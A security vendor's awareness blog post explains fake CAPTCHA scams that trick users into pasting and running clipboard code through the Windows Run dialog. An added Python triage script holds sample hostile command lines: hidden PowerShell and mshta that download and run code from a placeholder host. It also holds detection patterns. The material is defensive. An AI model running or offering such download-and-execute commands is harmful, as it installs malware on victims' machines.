New Fake CAPTCHA Scam

Written by TraceSecurity | Apr 17, 2025

By Eddy Berry, Security Research Analyst, TraceSecurity

Each day, more and more scams and malicious websites are popping up. It’s dangerous enough to go onto these websites, but bad actors are using common verification tools like CAPTCHA to hack people. CAPTCHAs have been part of the Internet for decades now, but they’ve never really been the target of a hacker tool. If you see one of these verification tools on an unknown website, it’s never a good idea to click them.

CAPTCHAs are good to have on websites and other programs, despite being somewhat annoying. They reduce the number of bots that can get into a website, since passing one requires human input. They are becoming more advanced, but at the same time, bad actors are using them to trick people into installing malware on their computers.

What is a CAPTCHA?

A CAPTCHA, or “Completely Automated Public Turing test to tell Computers and Humans Apart”, is a challenge that some websites use to verify whether the user is a human or a bot. It is used to prevent spam and the various other automated actions that a bot may bring to the website. Normally, a bot will not be able to pass a CAPTCHA, since a person has to click pictures or type the characters shown.

These challenge-response tests have you click a button or check box to begin. In doing so, the CAPTCHA function starts and either confirms the response or denies it. This click is exactly the step bad actors have been taking advantage of, so it’s never a good idea to run these CAPTCHAs on websites that you don’t trust.

Fake CAPTCHAs

Bad actors are using fake CAPTCHAs to install malware onto devices. PCs and mobile devices are not safe from these, regardless of whether you have defenses in place. Clicking on a fake CAPTCHA in effect gives the malicious website permission to write to your clipboard, placing dangerous code on it.

After you click the “I am not a robot” check mark, the fake CAPTCHA function secretly adds a script or some other code to your clipboard. This alone isn’t enough to hack your computer, but the next step instructs you to do something strange. It tells you to press the Windows + R keys, press the Ctrl + V keys, and then hit Enter. For most people, these may seem like normal things to do, but this is the key to the hack.

The Windows + R keys open up a command prompt, a console from which you can make system changes to your PC. The Ctrl + V keys paste whatever was most recently copied to your clipboard (the ordinary copy and paste function), and hitting Enter executes the pasted code, which runs the malicious script on your PC.

CAPTCHAs will never ask you to do special steps when it comes to verification. At most, you will have to type letters or numbers or click matching pictures. Anything that asks you to press certain keys is incredibly suspicious and it should be treated with the utmost caution. No website will tell you to press certain keystrokes unless they are trying to get deeper into your PC.
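The paste-into-Run step described above leaves a distinctive trace: the script interpreter is started by explorer.exe (the process behind the Run dialog) rather than by a terminal or a build tool. The following Python triage, added here as an example and not part of TraceSecurity's post, scores constructed Sysmon-style process-creation records for that pattern; the event tuples, domain names and rule names are all assumptions made up for the demonstration.

```python
import re

# Constructed Sysmon Event ID 1 style records: (parent_image, image, command_line).
# These are made-up samples for the demo, not telemetry from a real incident.
SAMPLE_EVENTS = [
    ("C:\\Windows\\explorer.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     'powershell -w hidden -c "irm https://captcha.example.invalid/verify | iex"'),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\mshta.exe",
     "mshta https://captcha.example.invalid/check.hta"),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\notepad.exe", "notepad"),
    ("C:\\Windows\\System32\\cmd.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell -File build.ps1"),
]

# Interpreters a pasted one-liner typically lands in when run from the Run dialog.
INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe")

# Command-line traits that are unusual for something a person typed by hand.
SUSPICIOUS = {
    "hidden-window": r"-w(indowstyle)?\s+hidden",
    "invoke-expression": r"\b(iex|invoke-expression)\b",
    "remote-download": r"https?://|downloadstring|invoke-webrequest|\birm\b|\biwr\b",
}


def triage(events):
    """Return (image name, [rule names]) for explorer.exe-launched interpreters
    whose command line matches at least one suspicious trait."""
    hits = []
    for parent, image, cmdline in events:
        # The Run dialog is hosted by explorer.exe, so that is the parent we care about.
        if not parent.lower().endswith("\\explorer.exe"):
            continue
        if not image.lower().endswith(INTERPRETERS):
            continue
        reasons = [name for name, pattern in SUSPICIOUS.items()
                   if re.search(pattern, cmdline, re.IGNORECASE)]
        if reasons:
            hits.append((image.rsplit("\\", 1)[-1], reasons))
    return hits


if __name__ == "__main__":
    for image, reasons in triage(SAMPLE_EVENTS):
        print(f"suspicious Run-dialog launch: {image} ({', '.join(reasons)})")
```

During incident response the same pasted commands can also be recovered from the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which corroborates a hit from process telemetry.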

Protect Against Fake CAPTCHA Scams

It can be overwhelming with all the information floating around when it comes to security awareness. There are millions of scammers out there, many of them with different methods of attack. However, there are a few things that you can remember to keep yourself from being hacked.

  • Keep your antivirus updated. Even if you accidentally complete one of these fake CAPTCHAs, your antivirus program will likely be able to stop any malicious code that activates on your PC. However, out-of-date programs can lead to gaps in security, leaving you vulnerable to attacks like this.
  • Double-check everything. Make sure you check the URL of the website you’re visiting and look for anything that seems strange. CAPTCHA verifications are common, but they won’t suddenly appear without the website informing its users first.
  • Don’t take additional steps. If a CAPTCHA challenge on a website asks you to do anything more than type letters or words or click pictures, you should be wary. A normal CAPTCHA will never ask you to perform keystrokes or various other PC functions.
  • Trust your gut. This is a general rule for most security awareness, but if something feels off or weird, it’s probably a bad actor trying to get into your PC. Remain calm and reject anything strange.

The Internet can be a dangerous place with new scams and malicious websites popping up every day. CAPTCHAs are the latest scams for bad actors – they are a perfect target since they’re very common and they all seem different. While they are annoying to get through, CAPTCHAs perform an important function to keep bots and other automation out of websites.

There are plenty of ways to defend against these sorts of attacks. If security awareness is a high priority for you, then it should be easy to recognize a bad actor’s attack. Keep your antivirus and programs up to date, double-check and verify everything, never give personal information, and always trust your gut. Even in today’s harsh environments of cybersecurity, you can always keep your information safe.

Connect with TraceSecurity to learn more.